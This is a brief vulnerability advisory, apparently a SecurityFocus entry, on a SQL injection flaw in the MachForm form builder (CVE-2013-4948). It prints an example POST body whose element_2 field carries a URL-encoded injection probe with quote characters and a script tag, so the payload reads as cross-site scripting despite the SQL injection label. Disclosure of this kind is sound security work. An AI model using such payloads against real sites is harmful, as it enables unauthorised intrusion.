MachForm CVE-2013-4948 SQL Injection Vulnerability

An attacker can use a browser to exploit this issue.

The following example POST request data for SQL-injection is available:

element_1=1&element_2=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28949236%29%3c%2fScRiPt%3e&element_3=1&form_id=11&submit=Enviar


 

Privacy Statement
Copyright 2010, SecurityFocus